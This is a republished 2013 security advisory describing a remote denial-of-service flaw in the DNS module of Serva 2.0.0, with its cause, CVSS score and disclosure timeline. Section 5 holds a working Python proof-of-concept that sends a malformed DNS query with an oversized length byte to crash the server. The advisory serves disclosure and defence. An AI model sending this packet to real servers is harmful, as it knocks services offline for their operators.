Serva 2.0.0 DNS Server Denial Of Service

2013-01-14T00:00:00
ID PACKETSTORM:119533
Type packetstorm
Reporter Julien Ahrens
Modified 2013-01-14T00:00:00

Description

                                        
                                            `Inshell Security Advisory  
http://www.inshell.net  
  
  
1. ADVISORY INFORMATION  
-----------------------  
Product: Serva  
Vendor URL: www.vercot.com  
Type: Uncaught Exception [CWE-248]  
Date found: 2012-07-08  
Date published: 2013-01-14  
CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)  
CVE: -  
  
  
2. CREDITS  
----------  
This vulnerability was discovered and researched by Julien Ahrens from  
Inshell Security.  
  
  
3. VERSIONS AFFECTED  
--------------------  
Serva 2.0.0, older versions may be affected too.  
  
  
4. VULNERABILITY DESCRIPTION  
----------------------------  
Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in  
the DNS module.  
  
The Query Name consists of multiple byte fields which contain the length  
of the subsequent part of the name query. The application does not  
properly validate the first length-field, which could lead to a stack  
corruption resulting in a remote denial of service condition.  
  
An attacker needs to send a DNS request with a manipulated length-byte  
with a size greater than "\x7F" in the Query Name field to crash the  
application.  
  
Since parts of the Tftpd32 v4.0 release are used in Serva, this bug was  
ported from the Tftpd32 v4.0 release too  
(http://www.securityfocus.com/archive/1/522877).  
  
  
5. PROOF-OF-CONCEPT (Code / Exploit)  
------------------------------------  
#!/usr/bin/python  
  
import socket  
  
target="192.168.0.1"  
port=53  
  
TransACTID="\x03\xc3"  
Flags="\x01\x00"  
QuestionRRC="\x00\x01"  
AnswerRRC="\x00\x00"  
AuthRRC="\x00\x00"  
AddRRC="\x00\x00"  
QueryName="\xFF\x69\x6e\x73\x68\x65\x6c\x6c\x03\x6e\x65\x74\x00"  
QueryType="\x00\x01"  
QueryClass="\x00\x01"  
payload = TransACTID + Flags + QuestionRRC + AnswerRRC + AuthRRC +  
AddRRC + QueryName + QueryType + QueryClass  
  
print "[*] Connecting to Target " + target + "..."  
  
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)  
  
print "[*] Sending malformed request..."  
  
s.sendto(payload,(target,port))  
  
print "[!] Exploit has been sent!\n"  
s.close()  
  
  
For further Screenshots and/or PoCs visit:  
http://security.inshell.net/advisory/33  
  
  
6. SOLUTION  
-----------  
None  
  
  
7. REPORT TIMELINE  
------------------  
2012-07-08: Initial notification sent to vendor  
2012-07-18: Vendor provides bugfix - release to verify that the  
vulnerability has been properly fixed  
2012-07-22: Inshell confirms that the bug has been fixed  
2012-08-29: Inshell asks vendor about the ETA of the planned release  
2012-08-29: Vendor states that the release takes a bit longer than expected  
2012-10-04: Inshell asks about ETA of the new release  
2012-10-04: Vendor states that there will be another delay, because  
other features need to be added  
2012-11-17: Inshell asks about hotfix solution  
2012-11-18: Vendor states that there is no time for releasing a hotfix  
2013-01-13: Full Disclosure  
  
  
8. REFERENCES  
-------------  
http://security.inshell.net/advisory/33  
http://www.securityfocus.com/archive/1/522877  
`